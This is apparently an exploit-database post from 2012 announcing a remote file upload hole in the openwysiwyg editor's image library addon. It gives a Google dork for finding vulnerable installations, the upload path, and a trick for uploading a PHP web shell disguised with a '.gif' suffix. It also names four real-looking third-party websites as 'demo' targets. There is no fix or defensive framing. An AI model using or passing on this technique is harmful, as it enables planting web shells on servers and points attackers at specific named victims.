facebook facebook twitter rss

openwysiwyg Remote File Upload Vulnerability

Author: The Black Devils , Published: 29-09-2012
       db                                       88                          
d88b ""
d8'`8b
d8' `8b ,adPPYba, ,adPPYba, ,adPPYba, 88 8b,dPPYba, ,adPPYba,
d8YaaaaY8b I8[ "" a8P_____88 I8[ "" 88 88P' `"8a a8" "8a
d8""""""""8b `"Y8ba, 8PP""""""" `"Y8ba, 88 88 88 8b d8
d8' `8b aa ]8I "8b, ,aa aa ]8I 88 88 88 "8a, ,a8"
d8' `8b `"YbbdP"' `"Ybbd8"' `"YbbdP"' 88 88 88 `"YbbdP"'


# Exploit Title: openwysiwyg Remote File Upload Vulnerability
# Date: 03/09/2012
# Author: The Black Devils
# Home: 1337day Exploit DataBase 1337day.com
# Software Link: http://www.openwebware.com/
# Category : [ webapps ]
# Google dork: inurl:/imagelibrary/insert_image.php
# Tested on: [Windows]


-------------------------------

http:/Localhost/[path]/addons/imagelibrary/insert_image.php
upload your shell shell.php;.gif
or use live http headers

-------------------------------
# Demo site:
http://mprmpolytechnic.com/wpro_js/addons/imagelibrary/insert_image.php
http://www.asnh.org/wysiwyg/addons/imagelibrary/insert_image.php
http://www.menlo.edu/sites/all/libraries/openwysiwyg/addons/imagelibrary/insert_image.php
http://peaksport.com.ua/sites/all/libraries/openwysiwyg/addons/imagelibrary/insert_image.php


-------------------------------


#------------------
Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios
#------------------

Like us on Facebook :